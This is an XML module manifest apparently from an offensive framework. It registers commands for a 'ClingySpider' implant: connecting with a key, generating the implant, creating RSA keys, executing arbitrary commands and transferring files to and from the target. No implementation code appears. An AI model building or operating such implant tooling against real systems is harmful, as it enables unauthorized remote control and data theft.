<?xml version="1.0" encoding="UTF-8" standalone="yes"?>

<Module name='ClSp'>
	<Command name='clsp_connect' provider='ClSp_connect.py' type='script'>
		<Description>Opens and exports a direct connection to ClingySpider Implant</Description>
		<Argument name='host' type='string'>
			<Description>Implant listening host</Description>
		</Argument>
		<Argument name='port' type='string'>
			<Description>Implant listening port</Description>
		</Argument>
		<Argument name='key_path' type='string'>
			<Description>Private key file</Description>
		</Argument>
	</Command>	
	<Command name='clsp_prepare' provider='ClSp_prepare.py' type='script'>
		<Description>Generates a ready-to-use ClingySpider implant</Description>
	</Command>
	<Command name='keygen' provider='keygen.py' type='script'>
		<Description>Generates and saves rsa keypair</Description>
		<Argument name='key_path' type='string'>
			<Description>Keypair output directory</Description>
		</Argument>
	</Command>		
	<Command name='whoami' provider='whoami.py' dependency='clsp' type='script'></Command>	
	<Command name='pwd' provider='pwd.py' dependency='clsp' type='script'></Command>	
	<Command name='exec' provider='exec.py' dependency='clsp' type='script'>
		<Description>Executes the specified command and returns the output</Description>
		<Argument name='cmd' type='string'>
			<Description>Command to execute</Description>
		</Argument>
	</Command>		
	<Command name='put' provider='put.py' dependency='clsp' type='script'>
		<Argument name='source_path' type='string'>
			<Description>Path to source file</Description>
		</Argument>		
		<Argument name='save_path' type='string'>
			<Description>Path to output file</Description>
		</Argument>
	</Command>		
	<Command name='get' provider='get.py' dependency='clsp' type='script'>
		<Argument name='source_path' type='string'>
			<Description>Path to source file</Description>
		</Argument>		
		<Argument name='save_path' type='string'>
			<Description>Path to output file</Description>
		</Argument>
	</Command>	
</Module>